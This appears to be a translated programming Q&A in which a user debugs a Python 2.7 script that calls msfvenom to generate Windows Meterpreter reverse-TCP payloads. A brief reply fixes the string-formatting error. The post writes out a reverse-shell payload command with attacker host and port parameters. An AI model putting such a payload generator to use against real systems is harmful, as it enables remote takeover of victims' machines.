我试图用Python 2.7.12创建一个Metasploit负载生成器。它使用msfvenom
产生许多恶意有效载荷。在Python中传递命令行参数时将字符串附加到字符串中2.7.12
首先我使用%s
和%d
格式运算符。
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s",
"LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost),
str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop))
此错误返回
/usr/bin/msfvenom:168:in `parse_args': invalid argument: -i %d
(OptionParser::InvalidArgument)
from /usr/bin/msfvenom:283:in `<main>'
Traceback (most recent call last):
File "menu.py", line 74, in <module>
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=%s",
"LPORT=%s", "-e %s", "-i %d", "-f %s", "> %s.%s"]) % (str(lhost),
str(lport), str(encode), iteration, str(formatop), str(payname), str(formatop))
TypeError: unsupported operand type(s) for %: 'int' and 'str'
我能够理解msfvenom无法解析我传递参数,这是迭代标志,-i
。之后,我看到Python的一个错误,TypeError
。
进行一番研究,我决定使用.format()
,因为
call(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST={0}",
"LPORT={1}", "-e {2}", "-i {3}", "-f {4}", "> {5}.{6}"]).format(lhost,
lport, encode, iteration, formatop, payname, formatop)
返回
AttributeError: 'int' object has no attribute 'format'
我应该怎么办?也有反正我可以优化我的程序,而不是复制和粘贴同一行,并更改15个选项的有效载荷类型?
您需要在字符串上调用'format',即''值为:{}“。format(1)' – maxymoo